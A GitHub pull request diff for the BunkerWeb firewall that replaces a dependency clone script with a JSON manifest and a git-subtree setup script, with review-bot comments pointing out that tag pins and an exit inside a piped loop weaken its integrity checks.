Merge pull request #547 from bunkerity/subtrees

Migrate regular cloned deps into subtrees
This commit is contained in:
Théophile Diot 2023-06-30 15:45:35 -04:00 committed by GitHub
commit 5631e27378
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2772 changed files with 44023 additions and 402716 deletions


@ -1,342 +0,0 @@
#!/bin/bash
function git_update_checker() {
repo="$1"
commit="$2"
main_tmp_folder="/tmp/bunkerweb"
mkdir -p "${main_tmp_folder}"
echo " Check updates for ${repo}"
folder="$(echo "$repo" | sed -E "s@https://github.com/.*/(.*)\.git@\1@")"
output="$(git clone --recursive "$repo" "${main_tmp_folder}/${folder}")"
if [ $? -ne 0 ] ; then
echo "❌ Error cloning $1"
echo "$output"
rm -rf "${main_tmp_folder}/${folder}" || true
return
fi
old_dir="$(pwd)"
cd "${main_tmp_folder}/${folder}"
output="$(git checkout "${commit}^{commit}" 2>&1)"
if [ $? -ne 0 ] ; then
echo "❌ Commit hash $commit is absent from repository $repo"
echo "$output"
rm -rf "${main_tmp_folder}/${folder}" || true
cd "$old_dir"
return
fi
output="$(git fetch 2>&1)"
if [ $? -ne 0 ] ; then
echo "⚠️ Upgrade version checker error on $repo"
echo "$output"
rm -rf "${main_tmp_folder}/${folder}" || true
cd "$old_dir"
return
fi
latest_tag=$(git describe --tags `git rev-list --tags --max-count=1`)
if [ $? -ne 0 ] ; then
echo "⚠️ Upgrade version checker error on getting latest tag $repo"
echo "$latest_tag"
rm -rf "${main_tmp_folder}/${folder}" || true
cd "$old_dir"
return
fi
latest_release=$(curl --silent "https://api.github.com/repos/$full_name_repo/releases/latest" | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
if [ $? -ne 0 ] ; then
echo "⚠️ Upgrade version checker error on getting latest release $repo"
echo "$latest_release"
rm -fr "${main_tmp_folder}/${folder}" || true
cd "$old_dir"
return
fi
current_tag=$(git describe --tags)
if [[ ! -z "$latest_tag" ]] && [[ "$current_tag" != *"$latest_tag"* ]]; then
echo "⚠️ Update checker: new tag found: $latest_tag, current tag/release: $current_tag, please update"
fi
if [[ ! -z "$latest_release" ]] && [[ "$current_tag" != *"$latest_release"* ]]; then
echo "⚠️ Update checker: new tag found: $latest_release, current tag/release: $current_tag, please update"
fi
rm -rf "${main_tmp_folder}/${folder}" || true
cd "$old_dir"
}
function git_secure_clone() {
repo="$1"
commit="$2"
folder="$(echo "$repo" | sed -E "s@https://github.com/.*/(.*)\.git@\1@")"
if [ ! -d "deps/src/${folder}" ] ; then
output="$(git clone --recursive "$repo" "deps/src/${folder}")"
if [ $? -ne 0 ] ; then
echo "❌ Error cloning $1"
echo "$output"
exit 1
fi
old_dir="$(pwd)"
cd "deps/src/${folder}"
output="$(git checkout "${commit}^{commit}" 2>&1)"
if [ $? -ne 0 ] ; then
echo "❌ Commit hash $commit is absent from repository $repo"
echo "$output"
exit 1
fi
cd "$old_dir"
output="$(rm -rf "deps/src/${folder}/.git")"
if [ $? -ne 0 ] ; then
echo "❌ Can't delete .git from repository $repo"
echo "$output"
exit 1
fi
else
echo "⚠️ Skipping clone of $repo because target directory is already present"
git_update_checker $repo $commit
fi
}
function secure_download() {
link="$1"
file="$2"
hash="$3"
dir="$(echo $file | sed 's/.tar.gz//g')"
if [ ! -d "deps/src/${dir}" ] ; then
output="$(wget -q -O "deps/src/${file}" "$link" 2>&1)"
if [ $? -ne 0 ] ; then
echo "❌ Error downloading $link"
echo "$output"
exit 1
fi
check="$(sha512sum "deps/src/${file}" | cut -d ' ' -f 1)"
if [ "$check" != "$hash" ] ; then
echo "❌️ Wrong hash from file $link (expected $hash got $check)"
exit 1
fi
else
echo "⚠️ Skipping download of $link because target directory is already present"
fi
}
function do_and_check_cmd() {
if [ "$CHANGE_DIR" != "" ] ; then
cd "$CHANGE_DIR"
fi
output=$("$@" 2>&1)
ret="$?"
if [ $ret -ne 0 ] ; then
echo "❌ Error from command : $*"
echo "$output"
exit $ret
fi
#echo $output
return 0
}
# nginx 1.24.0
echo " Downloading nginx"
NGINX_VERSION="1.24.0"
secure_download "https://nginx.org/download/nginx-${NGINX_VERSION}.tar.gz" "nginx-${NGINX_VERSION}.tar.gz" "1114e37de5664a8109c99cfb2faa1f42ff8ac63c932bcf3780d645e5ed32c0b2ac446f80305b4465994c8f9430604968e176ae464fd80f632d1cb2c8f6007ff3"
if [ -f "deps/src/nginx-${NGINX_VERSION}.tar.gz" ] ; then
do_and_check_cmd tar -xvzf deps/src/nginx-${NGINX_VERSION}.tar.gz -C deps/src
do_and_check_cmd rm -f deps/src/nginx-${NGINX_VERSION}.tar.gz
fi
# Lua 5.1.5
echo " Downloading Lua"
LUA_VERSION="5.1.5"
secure_download "https://www.lua.org/ftp/lua-${LUA_VERSION}.tar.gz" "lua-${LUA_VERSION}.tar.gz" "0142fefcbd13afcd9b201403592aa60620011cc8e8559d4d2db2f92739d18186860989f48caa45830ff4f99bfc7483287fd3ff3a16d4dec928e2767ce4d542a9"
if [ -f "deps/src/lua-${LUA_VERSION}.tar.gz" ] ; then
do_and_check_cmd tar -xvzf deps/src/lua-${LUA_VERSION}.tar.gz -C deps/src
do_and_check_cmd rm -f deps/src/lua-${LUA_VERSION}.tar.gz
do_and_check_cmd patch deps/src/lua-${LUA_VERSION}/Makefile deps/misc/lua.patch1
do_and_check_cmd patch deps/src/lua-${LUA_VERSION}/src/Makefile deps/misc/lua.patch2
fi
# LuaJIT v2.1-20230410
echo " Downloading LuaJIT"
git_secure_clone "https://github.com/openresty/luajit2.git" "04f33ff01da97905a1641985fb5c840d234f97f1"
# lua-nginx-module v0.10.25
echo " Downloading lua-nginx-module"
git_secure_clone "https://github.com/openresty/lua-nginx-module.git" "c47084b5d719ce507d2419d8660f39544a9d1fea"
# lua-resty-core v0.1.27
echo " Downloading lua-resty-core"
git_secure_clone "https://github.com/openresty/lua-resty-core.git" "31fae862a1ed64033591f991fadb0dd80358ba0b"
# lua-resty-lrucache v0.13
echo " Downloading lua-resty-lrucache"
git_secure_clone "https://github.com/openresty/lua-resty-lrucache.git" "a79615ec9dc547fdb4aaee59ef8f5a50648ce9fd"
# lua-resty-dns v0.22
echo " Downloading lua-resty-dns"
git_secure_clone "https://github.com/openresty/lua-resty-dns.git" "869d2fbb009b6ada93a5a10cb93acd1cc12bd53f"
# lua-resty-session v4.0.4
echo " Downloading lua-resty-session"
git_secure_clone "https://github.com/bungle/lua-resty-session.git" "8b5f8752f3046396c414c5b97850e784c07e1641"
# lua-resty-random v?
echo " Downloading lua-resty-random"
git_secure_clone "https://github.com/bungle/lua-resty-random.git" "17b604f7f7dd217557ca548fc1a9a0d373386480"
# lua-resty-string v0.15
echo " Downloading lua-resty-string"
git_secure_clone "https://github.com/openresty/lua-resty-string.git" "b192878f6ed31b0af237935bbc5a8110a3c2256c"
# lua-cjson v2.1.0.12
echo " Downloading lua-cjson"
git_secure_clone "https://github.com/openresty/lua-cjson.git" "881accc8fadca5ec02aa34d364df2a1aa25cd2f9"
# lua-gd v2.0.33r3+
echo " Downloading lua-gd"
git_secure_clone "https://github.com/ittner/lua-gd.git" "2ce8e478a8591afd71e607506bc8c64b161bbd30"
# lua-resty-http v0.17.1
echo " Downloading lua-resty-http"
git_secure_clone "https://github.com/ledgetech/lua-resty-http.git" "4ab4269cf442ba52507aa2c718f606054452fcad"
# lualogging v1.8.2
echo " Downloading lualogging"
git_secure_clone "https://github.com/lunarmodules/lualogging.git" "465c994788f1bc18fca950934fa5ec9a909f496c"
# luasocket v3.1.0
echo " Downloading luasocket"
git_secure_clone "https://github.com/diegonehab/luasocket.git" "95b7efa9da506ef968c1347edf3fc56370f0deed"
# luasec v1.3.1
echo " Downloading luasec"
git_secure_clone "https://github.com/brunoos/luasec.git" "fddde111f7fe9ad5417d75ebbd70429d13eaad97"
# lua-resty-ipmatcher v0.6.1 (3 commits after just in case)
echo " Downloading lua-resty-ipmatcher"
dopatch="no"
if [ ! -d "deps/src/lua-resty-ipmatcher" ] ; then
dopatch="yes"
fi
git_secure_clone "https://github.com/api7/lua-resty-ipmatcher.git" "7fbb618f7221b1af1451027d3c64e51f3182761c"
if [ "$dopatch" = "yes" ] ; then
do_and_check_cmd patch deps/src/lua-resty-ipmatcher/resty/ipmatcher.lua deps/misc/ipmatcher.patch
fi
# lua-resty-redis v0.30
echo " Downloading lua-resty-redis"
git_secure_clone "https://github.com/openresty/lua-resty-redis.git" "d7c25f1b339d79196ff67f061c547a73a920b580"
# lua-resty-upload v0.11
echo " Downloading lua-resty-upload"
git_secure_clone "https://github.com/openresty/lua-resty-upload.git" "03704aee42f7135e7782688d8a9af63a16015edc"
# luajit-geoip v2.1.0
echo " Downloading luajit-geoip"
dopatch="no"
if [ ! -d "deps/src/luajit-geoip" ] ; then
dopatch="yes"
fi
git_secure_clone "https://github.com/leafo/luajit-geoip.git" "12a9388207f40c37ad5cf6de2f8e0cc72bf13477"
if [ "$dopatch" = "yes" ] ; then
do_and_check_cmd patch deps/src/luajit-geoip/geoip/mmdb.lua deps/misc/mmdb.patch
fi
# lbase64 v1.5.3
echo " Downloading lbase64"
git_secure_clone "https://github.com/iskolbin/lbase64.git" "c261320edbdf82c16409d893a96c28c704aa0ab8"
# lua-resty-env v0.4.0
echo " Downloading lua-resty-env"
git_secure_clone "https://github.com/3scale/lua-resty-env.git" "adb294def823dd910ffa11972d2c61eab7cfce3e"
# lua-resty-mlcache v2.6.0
echo " Downloading lua-resty-mlcache"
git_secure_clone "https://github.com/thibaultcha/lua-resty-mlcache.git" "f140f56663cbdb9cdd247d29f75c299c702ff6b4"
# lua-resty-template v2.0
echo " Downloading lua-resty-template"
git_secure_clone "https://github.com/bungle/lua-resty-template.git" "c08c6bc9e27710806990f2dec0f03b19406976ac"
# lua-resty-lock v0.09
echo " Downloading lua-resty-lock"
git_secure_clone "https://github.com/openresty/lua-resty-lock.git" "9dc550e56b6f3b1a2f1a31bb270a91813b5b6861"
# lua-resty-openssl v0.8.23
echo " Downloading lua-resty-openssl"
dopatch="no"
if [ ! -d "deps/src/lua-resty-openssl" ] ; then
dopatch="yes"
fi
git_secure_clone "https://github.com/fffonion/lua-resty-openssl.git" "b23c072a405b749ac60d21e3946cbf57a959b780"
if [ "$dopatch" == "yes" ] ; then
do_and_check_cmd rm -r deps/src/lua-resty-openssl/t
fi
# lua-ffi-zlib v0.5.0
echo " Downloading lua-ffi-zlib"
dopatch="no"
if [ ! -d "deps/src/lua-ffi-zlib" ] ; then
dopatch="yes"
fi
git_secure_clone "https://github.com/hamishforbes/lua-ffi-zlib.git" "1fb69ca505444097c82d2b72e87904f3ed923ae9"
if [ "$dopatch" = "yes" ] ; then
do_and_check_cmd patch deps/src/lua-ffi-zlib/lib/ffi-zlib.lua deps/misc/lua-ffi-zlib.patch
fi
# lua-resty-signal v0.03
echo " Downloading lua-resty-signal"
git_secure_clone "https://github.com/openresty/lua-resty-signal.git" "d07163e8cfa673900e66048cd2a1f18523aecf16"
# ModSecurity v3.0.9
echo " Downloading ModSecurity"
dopatch="no"
if [ ! -d "deps/src/ModSecurity" ] ; then
dopatch="yes"
fi
git_secure_clone "https://github.com/SpiderLabs/ModSecurity.git" "205dac0e8c675182f96b5c2fb06be7d1cf7af2b2"
if [ "$dopatch" = "yes" ] ; then
do_and_check_cmd patch deps/src/ModSecurity/configure.ac deps/misc/modsecurity.patch
do_and_check_cmd rm -rf deps/src/ModSecurity/others/libinjection
fi
# libinjection v3.10.0+
# TODO: check if the latest commit is fine
echo " Downloading libinjection"
git_secure_clone "https://github.com/libinjection/libinjection.git" "49904c42a6e68dc8f16c022c693e897e4010a06c"
do_and_check_cmd cp -r deps/src/libinjection deps/src/ModSecurity/others
# ModSecurity-nginx v1.0.3
echo " Downloading ModSecurity-nginx"
dopatch="no"
if [ ! -d "deps/src/ModSecurity-nginx" ] ; then
dopatch="yes"
fi
git_secure_clone "https://github.com/SpiderLabs/ModSecurity-nginx.git" "d59e4ad121df702751940fd66bcc0b3ecb51a079"
if [ "$dopatch" = "yes" ] ; then
do_and_check_cmd patch deps/src/ModSecurity-nginx/src/ngx_http_modsecurity_log.c deps/misc/modsecurity-nginx.patch
do_and_check_cmd patch deps/src/ModSecurity-nginx/config deps/misc/config.patch
do_and_check_cmd patch deps/src/ModSecurity-nginx/src/ngx_http_modsecurity_common.h deps/misc/ngx_http_modsecurity_common.h.patch
do_and_check_cmd patch deps/src/ModSecurity-nginx/src/ngx_http_modsecurity_module.c deps/misc/ngx_http_modsecurity_module.c.patch
do_and_check_cmd cp deps/misc/ngx_http_modsecurity_access.c deps/src/ModSecurity-nginx/src
fi
# libmaxminddb v1.7.1
echo " Downloading libmaxminddb"
git_secure_clone "https://github.com/maxmind/libmaxminddb.git" "ac4d0d2480032a8664e251588e57d7b306ca630c"
# zlib v1.2.13
echo " Downloading zlib"
git_secure_clone "https://github.com/madler/zlib.git" "04f42ceca40f73e2978b50e93806c2a18c1281fc"
# headers-more-nginx-module v0.34
echo " Downloading headers-more-nginx-module"
git_secure_clone "https://github.com/openresty/headers-more-nginx-module.git" "bea1be3bbf6af28f6aa8cf0c01c07ee1637e2bd0"
# nginx_cookie_flag_module v1.1.0
echo " Downloading nginx_cookie_flag_module"
git_secure_clone "https://github.com/AirisX/nginx_cookie_flag_module.git" "4e48acf132952bbed43b28a8e6af0584dacb7b4c"
# ngx_brotli v1.0.0
echo " Downloading ngx_brotli"
git_secure_clone "https://github.com/google/ngx_brotli.git" "6e975bcb015f62e1f303054897783355e2a877dc"
# ngx_devel_kit v0.3.2
echo " Downloading ngx_devel_kit"
git_secure_clone "https://github.com/vision5/ngx_devel_kit.git" "b4642d6ca01011bd8cd30b253f5c3872b384fd21"
# stream-lua-nginx-module v0.0.13
echo " Downloading stream-lua-nginx-module"
git_secure_clone "https://github.com/openresty/stream-lua-nginx-module.git" "309198abf26266f1a3e53c71388ed7bb9d1e5ea2"

src/deps/deps.json Normal file

@ -0,0 +1,233 @@
{
"download": [
{
"name": "Lua",
"url": "https://www.lua.org/ftp/lua-5.1.5.tar.gz",
"sha512": "0142fefcbd13afcd9b201403592aa60620011cc8e8559d4d2db2f92739d18186860989f48caa45830ff4f99bfc7483287fd3ff3a16d4dec928e2767ce4d542a9"
}
],
"git_repository": [
{
"id": "luajit",
"name": "LuaJIT",
"url": "https://github.com/openresty/luajit2.git",
"commit": "v2.1-20230410"
},
{
"id": "modsecurity",
"name": "ModSecurity",
"url": "https://github.com/SpiderLabs/ModSecurity.git",
"commit": "v3.0.9"
},
{
"id": "modsecurity-nginx",
"name": "ModSecurity-nginx",
"url": "https://github.com/SpiderLabs/ModSecurity-nginx.git",
"commit": "v1.0.3"
},
{
"id": "nginx",
"name": "Nginx",
"url": "https://github.com/nginx/nginx.git",
"commit": "release-1.24.0"
},
{
"id": "ngx_brotli",
"name": "Nginx Brotli v1.0.9",
"url": "https://github.com/google/ngx_brotli.git",
"commit": "6e975bcb015f62e1f303054897783355e2a877dc"
},
{
"id": "nginx_cookie_flag_module",
"name": "Nginx cookie flag module",
"url": "https://github.com/AirisX/nginx_cookie_flag_module.git",
"commit": "v1.1.0"
},
{
"id": "ngx_devel_kit",
"name": "Nginx devel kit",
"url": "https://github.com/vision5/ngx_devel_kit.git",
"commit": "v0.3.2"
},
{
"id": "headers-more-nginx-module",
"name": "headers-more-nginx-module",
"url": "https://github.com/openresty/headers-more-nginx-module.git",
"commit": "v0.34"
},
{
"id": "lbase64",
"name": "lbase64",
"url": "https://github.com/iskolbin/lbase64.git",
"commit": "v1.5.3"
},
{
"id": "libinjection",
"name": "libinjection v3.10.0+",
"url": "https://github.com/libinjection/libinjection.git",
"commit": "49904c42a6e68dc8f16c022c693e897e4010a06c"
},
{
"id": "libmaxminddb",
"name": "libmaxminddb",
"url": "https://github.com/maxmind/libmaxminddb.git",
"commit": "1.7.1"
},
{
"id": "lua-cjson",
"name": "lua-cjson",
"url": "https://github.com/openresty/lua-cjson.git",
"commit": "2.1.0.12"
},
{
"id": "lua-ffi-zlib",
"name": "lua-ffi-zlib",
"url": "https://github.com/hamishforbes/lua-ffi-zlib.git",
"commit": "v0.5"
},
{
"id": "lua-gd",
"name": "lua-gd v2.0.33r3+",
"url": "https://github.com/ittner/lua-gd.git",
"commit": "2ce8e478a8591afd71e607506bc8c64b161bbd30"
},
{
"id": "lua-nginx-module",
"name": "lua-nginx-module",
"url": "https://github.com/openresty/lua-nginx-module.git",
"commit": "v0.10.25"
},
{
"id": "lua-resty-core",
"name": "lua-resty-core",
"url": "https://github.com/openresty/lua-resty-core.git",
"commit": "v0.1.27"
},
{
"id": "lua-resty-dns",
"name": "lua-resty-dns",
"url": "https://github.com/openresty/lua-resty-dns.git",
"commit": "v0.22"
},
{
"id": "lua-resty-env",
"name": "lua-resty-env",
"url": "https://github.com/3scale/lua-resty-env.git",
"commit": "v0.4.0"
},
{
"id": "lua-resty-http",
"name": "lua-resty-http",
"url": "https://github.com/ledgetech/lua-resty-http.git",
"commit": "v0.17.1"
},
{
"id": "lua-resty-ipmatcher",
"name": "lua-resty-ipmatcher v0.6.1 (3 commits after just in case)",
"url": "https://github.com/api7/lua-resty-ipmatcher.git",
"commit": "7fbb618f7221b1af1451027d3c64e51f3182761c"
},
{
"id": "lua-resty-lock",
"name": "lua-resty-lock",
"url": "https://github.com/openresty/lua-resty-lock.git",
"commit": "v0.09"
},
{
"id": "lua-resty-lrucache",
"name": "lua-resty-lrucache",
"url": "https://github.com/openresty/lua-resty-lrucache.git",
"commit": "v0.13"
},
{
"id": "lua-resty-mlcache",
"name": "lua-resty-mlcache",
"url": "https://github.com/thibaultcha/lua-resty-mlcache.git",
"commit": "2.6.0"
},
{
"id": "lua-resty-openssl",
"name": "lua-resty-openssl",
"url": "https://github.com/fffonion/lua-resty-openssl.git",
"commit": "0.8.23"
},
{
"id": "lua-resty-random",
"name": "lua-resty-random (latest commit)",
"url": "https://github.com/bungle/lua-resty-random.git",
"commit": "17b604f7f7dd217557ca548fc1a9a0d373386480"
},
{
"id": "lua-resty-redis",
"name": "lua-resty-redis",
"url": "https://github.com/openresty/lua-resty-redis.git",
"commit": "v0.30"
},
{
"id": "lua-resty-session",
"name": "lua-resty-session",
"url": "https://github.com/bungle/lua-resty-session.git",
"commit": "v4.0.4"
},
{
"id": "lua-resty-signal",
"name": "lua-resty-signal",
"url": "https://github.com/openresty/lua-resty-signal.git",
"commit": "v0.03"
},
{
"id": "lua-resty-string",
"name": "lua-resty-string",
"url": "https://github.com/openresty/lua-resty-string.git",
"commit": "v0.15"
},
{
"id": "lua-resty-template",
"name": "lua-resty-template",
"url": "https://github.com/bungle/lua-resty-template.git",
"commit": "v2.0"
},
{
"id": "lua-resty-upload",
"name": "lua-resty-upload",
"url": "https://github.com/openresty/lua-resty-upload.git",
"commit": "v0.11"
},
{
"id": "luajit-geoip",
"name": "luajit-geoip",
"url": "https://github.com/leafo/luajit-geoip.git",
"commit": "v2.1.0"
},
{
"id": "lualogging",
"name": "lualogging",
"url": "https://github.com/lunarmodules/lualogging.git",
"commit": "v1.8.2"
},
{
"id": "luasec",
"name": "luasec",
"url": "https://github.com/brunoos/luasec.git",
"commit": "v1.3.1"
},
{
"id": "luasocket",
"name": "luasocket",
"url": "https://github.com/diegonehab/luasocket.git",
"commit": "v3.1.0"
},
{
"id": "stream-lua-nginx-module",
"name": "stream-lua-nginx-module",
"url": "https://github.com/openresty/stream-lua-nginx-module.git",
"commit": "v0.0.13"
},
{
"id": "zlib",
"name": "zlib",
"url": "https://github.com/madler/zlib.git",
"commit": "v1.2.13"
}
]
}
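Review bot: Most `git_repository` entries now pin a tag or branch name (`"v3.0.9"`, `"v1.0.3"`, `"release-1.24.0"`, `"v0.10.25"`, …) where the deleted clone.sh pinned a full commit hash, and tags are mutable refs: an upstream tag that is moved, deleted or re-pushed by a compromised maintainer account is what `git subtree add`/`pull` will fetch, and nothing in this manifest lets the consumer notice. The regression is sharpest for nginx, which moves from a sha512-verified tarball to an unverified `release-1.24.0` checkout of a mirror. The `download` entry already shows the right model with its `"sha512"` field; the git entries should keep the same property, e.g. keep `"commit"` as the 40-character SHA the tag resolved to at review time and carry the human-readable version in `"name"`, as the `ngx_brotli`, `libinjection`, `lua-gd` and `lua-resty-random` entries still do. Whether the tags here currently resolve to the hashes that were removed from clone.sh cannot be verified from this page and should be checked before merge.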

src/deps/init_deps.sh Executable file

@ -0,0 +1,59 @@
#!/bin/bash
function do_and_check_cmd() {
output=$("$@" 2>&1)
ret="$?"
if [ $ret -ne 0 ] ; then
echo "❌ Error from command : $*"
echo "$output"
exit $ret
fi
return 0
}
jq -c .download[] src/deps/deps.json | while read download
do
url="$(echo $download | jq -r .url)"
id="$(echo $url | sed 's/.*\/\([^\/]*\)\.tar\.gz/\1/')"
name="$(echo $download | jq -r .name)"
sha512="$(echo $download | jq -r .sha512)"
echo " Downloading ${name} from ${url}"
if [ ! -d "src/deps/src/${id}" ] ; then
do_and_check_cmd wget -q -O "src/deps/src/${id}.tar.gz" "$url"
check="$(sha512sum "src/deps/src/${id}.tar.gz" | cut -d ' ' -f 1)"
if [ "$check" != "$sha512" ] ; then
echo "❌️ Wrong hash from file $url (expected $sha512 got $check)"
exit 1
fi
if [ -f "src/deps/src/${id}.tar.gz" ] ; then
do_and_check_cmd tar -xvzf src/deps/src/${id}.tar.gz -C src/deps/src
do_and_check_cmd rm -f src/deps/src/${id}.tar.gz
fi
else
echo "⚠️ Skipping download of $url because target directory is already present"
fi
done
jq -c .git_repository[] src/deps/deps.json | while read repo
do
id="$(echo $repo | jq -r .id)"
name="$(echo $repo | jq -r .name)"
url="$(echo $repo | jq -r .url)"
commit="$(echo $repo | jq -r .commit)"
echo " Clone ${name} from ${url} at commit/version ${commit}"
if [ ! -d "src/deps/src/${id}" ] ; then
do_and_check_cmd git subtree add --prefix src/deps/src/${id} ${url} ${commit} --squash
else
echo "⚠️ Skipping clone of $url because target directory is already present"
echo " Updating ${name} from ${url} at commit/version ${commit}"
do_and_check_cmd git subtree pull --prefix src/deps/src/${id} ${url} ${commit} --squash
fi
if [ -d "src/deps/src/${id}/.git" ] ; then
do_and_check_cmd rm -rf "src/deps/src/${id}/.git"
fi
done
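Review bot: The `exit 1` on the sha512 mismatch, and every `exit` inside `do_and_check_cmd` called from the loops, only terminates the `while read` subshell created by the `jq ... |` pipeline, not the script; there is no `set -e`, so a tampered Lua tarball or a failed `git subtree add` stops that one loop and the script carries on and finishes with status 0. The cheapest fix is to propagate the subshell status by ending both loops with `done || exit 1` (the pipeline's status is the loop subshell's), or to feed each loop with `done < <(jq -c ... src/deps/deps.json)` so the `exit` calls act on the script itself. While there, `read` should be `read -r` and the `${url}` / `${commit}` / `${id}` expansions passed to `git subtree` should be quoted. Separately, `git subtree add --squash` resolves `${commit}` to whatever the remote ref points to at run time and nothing compares the fetched commit against an expected SHA, so the hash check that protects the tarball path has no counterpart on the git path.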


@ -41,16 +41,19 @@ CHANGE_DIR="/tmp/bunkerweb/deps/src/zlib" do_and_check_cmd make install
echo " Compiling and installing ModSecurity"
# temp fix : Debian run it twice
# TODO : patch it in clone.sh
cd /tmp/bunkerweb/deps/src/ModSecurity && ./build.sh > /dev/null 2>&1
CHANGE_DIR="/tmp/bunkerweb/deps/src/ModSecurity" do_and_check_cmd sh build.sh
CHANGE_DIR="/tmp/bunkerweb/deps/src/ModSecurity" do_and_check_cmd ./configure --disable-dependency-tracking --disable-static --disable-examples --disable-doxygen-doc --disable-doxygen-html --disable-valgrind-memcheck --disable-valgrind-helgrind --prefix=/usr/share/bunkerweb/deps --with-maxmind=/usr/share/bunkerweb/deps
CHANGE_DIR="/tmp/bunkerweb/deps/src/ModSecurity" do_and_check_cmd make -j $NTASK
CHANGE_DIR="/tmp/bunkerweb/deps/src/ModSecurity" do_and_check_cmd make install-strip
do_and_check_cmd patch /tmp/bunkerweb/deps/src/modsecurity/configure.ac /tmp/bunkerweb/deps/misc/modsecurity.patch
CHANGE_DIR="/tmp/bunkerweb/deps/src/modsecurity" do_and_check_cmd rm -rf others/libinjection
do_and_check_cmd cp -r /tmp/bunkerweb/deps/src/libinjection /tmp/bunkerweb/deps/src/modsecurity/others/libinjection
cd /tmp/bunkerweb/deps/src/modsecurity && ./build.sh > /dev/null 2>&1
CHANGE_DIR="/tmp/bunkerweb/deps/src/modsecurity" do_and_check_cmd sh build.sh
CHANGE_DIR="/tmp/bunkerweb/deps/src/modsecurity" do_and_check_cmd ./configure --disable-dependency-tracking --disable-static --disable-examples --disable-doxygen-doc --disable-doxygen-html --disable-valgrind-memcheck --disable-valgrind-helgrind --prefix=/usr/share/bunkerweb/deps --with-maxmind=/usr/share/bunkerweb/deps
CHANGE_DIR="/tmp/bunkerweb/deps/src/modsecurity" do_and_check_cmd make -j $NTASK
CHANGE_DIR="/tmp/bunkerweb/deps/src/modsecurity" do_and_check_cmd make install-strip
# Compiling and installing luajit2
echo " Compiling and installing luajit2"
CHANGE_DIR="/tmp/bunkerweb/deps/src/luajit2" do_and_check_cmd make -j $NTASK
CHANGE_DIR="/tmp/bunkerweb/deps/src/luajit2" do_and_check_cmd make PREFIX=/usr/share/bunkerweb/deps install
# Compiling and installing luajit
echo " Compiling and installing luajit"
CHANGE_DIR="/tmp/bunkerweb/deps/src/luajit" do_and_check_cmd make -j $NTASK
CHANGE_DIR="/tmp/bunkerweb/deps/src/luajit" do_and_check_cmd make PREFIX=/usr/share/bunkerweb/deps install
# Installing lua-resty-core
echo " Installing openresty/lua-resty-core"
@ -107,6 +110,7 @@ CHANGE_DIR="/tmp/bunkerweb/deps/src/luasec" do_and_check_cmd make LUACPATH=/usr/
# Installing lua-resty-ipmatcher
echo " Installing lua-resty-ipmatcher"
do_and_check_cmd patch /tmp/bunkerweb/deps/src/lua-resty-ipmatcher/resty/ipmatcher.lua /tmp/bunkerweb/deps/misc/ipmatcher.patch
CHANGE_DIR="/tmp/bunkerweb/deps/src/lua-resty-ipmatcher" do_and_check_cmd make INST_PREFIX=/usr/share/bunkerweb/deps INST_LIBDIR=/usr/share/bunkerweb/deps/lib/lua INST_LUADIR=/usr/share/bunkerweb/deps/lib/lua install
# Installing lua-resty-redis
@ -119,6 +123,7 @@ CHANGE_DIR="/tmp/bunkerweb/deps/src/lua-resty-upload" do_and_check_cmd make PREF
# Installing lujit-geoip
echo " Installing luajit-geoip"
do_and_check_cmd patch /tmp/bunkerweb/deps/src/luajit-geoip/geoip/mmdb.lua /tmp/bunkerweb/deps/misc/mmdb.patch
do_and_check_cmd cp -r /tmp/bunkerweb/deps/src/luajit-geoip/geoip /usr/share/bunkerweb/deps/lib/lua
# Installing lbase64
@ -143,11 +148,13 @@ CHANGE_DIR="/tmp/bunkerweb/deps/src/lua-resty-lock" do_and_check_cmd make PREFIX
# Installing lua-resty-openssl
echo " Installing lua-resty-openssl"
do_and_check_cmd rm -r /tmp/bunkerweb/deps/src/lua-resty-openssl/t
CHANGE_DIR="/tmp/bunkerweb/deps/src/lua-resty-openssl" do_and_check_cmd make LUA_LIB_DIR=/usr/share/bunkerweb/deps/lib/lua install
do_and_check_cmd cp /tmp/bunkerweb/deps/src/lua-resty-openssl/lib/resty/openssl.lua /usr/share/bunkerweb/deps/lib/lua/resty
# Installing lua-ffi-zlib
echo " Installing lua-ffi-zlib"
do_and_check_cmd patch /tmp/bunkerweb/deps/src/lua-ffi-zlib/lib/ffi-zlib.lua /tmp/bunkerweb/deps/misc/lua-ffi-zlib.patch
do_and_check_cmd cp /tmp/bunkerweb/deps/src/lua-ffi-zlib/lib/ffi-zlib.lua /usr/share/bunkerweb/deps/lib/lua
# Installing lua-resty-signal
@ -155,6 +162,12 @@ echo " Installing lua-resty-signal"
CHANGE_DIR="/tmp/bunkerweb/deps/src/lua-resty-signal" do_and_check_cmd make PREFIX=/usr/share/bunkerweb/deps -j $NTASK
CHANGE_DIR="/tmp/bunkerweb/deps/src/lua-resty-signal" do_and_check_cmd make PREFIX=/usr/share/bunkerweb/deps LUA_LIB_DIR=/usr/share/bunkerweb/deps/lib/lua install
do_and_check_cmd patch /tmp/bunkerweb/deps/src/modsecurity-nginx/src/ngx_http_modsecurity_log.c /tmp/bunkerweb/deps/misc/modsecurity-nginx.patch
do_and_check_cmd patch /tmp/bunkerweb/deps/src/modsecurity-nginx/config /tmp/bunkerweb/deps/misc/config.patch
do_and_check_cmd patch /tmp/bunkerweb/deps/src/modsecurity-nginx/src/ngx_http_modsecurity_common.h /tmp/bunkerweb/deps/misc/ngx_http_modsecurity_common.h.patch
do_and_check_cmd patch /tmp/bunkerweb/deps/src/modsecurity-nginx/src/ngx_http_modsecurity_module.c /tmp/bunkerweb/deps/misc/ngx_http_modsecurity_module.c.patch
do_and_check_cmd cp /tmp/bunkerweb/deps/misc/ngx_http_modsecurity_access.c /tmp/bunkerweb/deps/src/modsecurity-nginx/src
# Compile dynamic modules
echo " Compiling and installing dynamic modules"
CONFARGS="$(nginx -V 2>&1 | sed -n -e 's/^.*arguments: //p')"
@ -164,13 +177,15 @@ CONFARGS="$(echo -n "$CONFARGS" | sed "s/--with-ld-opt='-Wl/--with-ld-opt='-lpcr
if [ "$OS" = "fedora" ] ; then
CONFARGS="$(echo -n "$CONFARGS" | sed "s/--with-ld-opt='.*'/--with-ld-opt=-lpcre/" | sed "s/--with-cc-opt='.*'//")"
fi
echo '#!/bin/bash' > "/tmp/bunkerweb/deps/src/nginx-${NGINX_VERSION}/configure-fix.sh"
